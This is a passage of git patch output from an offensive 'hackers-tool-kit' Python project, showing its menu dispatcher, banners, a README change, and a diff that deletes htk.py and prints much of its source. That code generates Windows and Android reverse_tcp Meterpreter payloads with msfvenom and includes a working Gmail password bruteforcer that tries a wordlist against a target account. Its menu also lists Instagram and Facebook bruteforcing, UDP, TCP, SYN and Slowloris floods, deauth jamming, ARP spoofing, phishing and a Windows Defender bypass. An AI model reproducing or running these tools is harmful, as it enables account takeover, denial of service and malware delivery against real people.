socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 06409e9705188a1443bfe423be6f6d2e5b2951a1 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 11 May 2019 03:40:02 +0100 Subject: [PATCH 111/214] Add files via upload --- tools/skull.txt | 45 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 tools/skull.txt diff --git a/tools/skull.txt b/tools/skull.txt new file mode 100644 index 0000000..3713f24 --- /dev/null +++ b/tools/skull.txt @@ -0,0 +1,45 @@ + /\ + /..\ + / .. \ + / .. \ + / .. \ + | :: | + | :: | + | :: | + | :: | + .o oOOOOOOOo | :: | OOOo + Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO + OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO + OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB' + `O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo + .OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO + OOOOO '"OOOOOOOOOOOOOOOO"` oOO + oOOOOOba. .adOOOOOOOOOOba .adOOOOo. + oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO + OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO + "OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO" + Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :` + : .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? . + . oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo + '%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO': + `$" `OOOO' `O"Y | `OOOO' o . + . . OP" :: | : o . + | :: | + | :: | + . | /\ | . + |\ | / \ | /| + | `-._ | / \ | _.-' | + \ `-._ |/ \| _.-' / + \ `-' `-' / + `-._ @tuf_unkn0wn _.-' + `-._ _.-' + `-.________.-' + |\\\V///A| + |\\V///A\| + |\V///A\\| + |V///A\\\| + |//A\\\V/| + |/A\\\V//| + |/A\\\V//| + _|_.----._|_ + |__________| From 119d20417c69348dada4c17a7a14f2829089dd6b Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 11 May 2019 03:41:18 +0100 Subject: [PATCH 112/214] Update README.md --- README.md | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index fffaf8f..6565ef1 100644 --- a/README.md +++ b/README.md @@ -48,10 +48,12 @@ the htksecure.py file will run the hackers-tool-kit with proxychains and other t this is where i will try to put the most recent updates -* added comments to code making it easier too read * added a option to start a server via apache * added a clearall and a run option * everytime you run the script it will switch randomly between different banners + +* added banner option (same thing as clear option just people might not know that clear randomizes the banner) +also added more banners From eedce8228ff602580f3fae941b8fbf706dcb71bf Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 17:51:12 +0100 Subject: [PATCH 113/214] Delete htk.py --- htk.py | 2712 -------------------------------------------------------- 1 file changed, 2712 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index b77e6e6..0000000 --- a/htk.py +++ /dev/null @@ -1,2712 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,7) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal Hackers-Tool-Kit -arpspoof: arp spoofing | -sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ -payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ -crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ -traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ -resa : reset account password ██║ ██║ ██║ ██║ ██╗ -resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ -hashid : find the type of hash of a hash | -wafwoof : check a web application for firewall Hackers-Tool-Kit -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -mysqlv : scan for mysql version on a host -terminal: open another new terminal -source : get source code from a website -dirscan : web directory scanner / bruteforce -aserver : start a apache server -run : run a file -\033[91m---------------------------------------------------------------------------------\033[0m - """ -#-----------------# -#HELP BANNER END# - - -#WINDOWS REVERSE TCP PAYLOAD START# -#---------------------------------# -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#WINDOWS REVERSE TCP PAYLOAD END# - - -#ANDROID REVERSE TCP PAYLOAD START# -#---------------------------------# -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -#-------------------------------# -#ANDROID REVERSE TCP PAYLOAD END# - -#GMAIL BRUTEFORCE START# -#----------------------# -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -#--------------------# -#GMAIL BRUTEFORCE END# - -#PORT SCAN START# -#---------------# -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -#-------------# -#PORT SCAN END# - -#INSTAGRAM BRUTEFORCE START# -#--------------------------# -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -#------------------------# -#INSTAGRAM BRUTEFORCE END# - -#FACEBOOK BRUTEFORCE START# -#-------------------------# -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -#-----------------------# -#FACEBOOK BRUTEFORCE END# - -#HOST TO IP START# -#----------------# -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -#--------------# -#HOST TO IP END# - -#YOUR OWN IP START# -#-----------------# -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) - print "\n Router IP" - print "----------------------------\033[92m" - os.system('curl "http://myexternalip.com/raw"') - print "\n\033[0m----------------------------" -#---------------# -#YOUR OWN IP END# - - -#AUTOMATED WIFI HACK START# -#-------------------------# -def wifite(): - os.system("wifite") -#-----------------------# -#AUTOMATED WIFI HACK END# - - -#MONITOR MODE START# -#------------------# -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -#----------------# -#MONITOR MODE END# - - -#DEVICES IN THE NET START# -#------------------------# -def netdev(): - os.system("netdiscover") -#----------------------# -#DEVICES IN THE NET END# - - -#NETS AROUND YOU START# -#-----------------------# -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -#---------------------# -#NETS AROUND YOU END# - - -#INFO 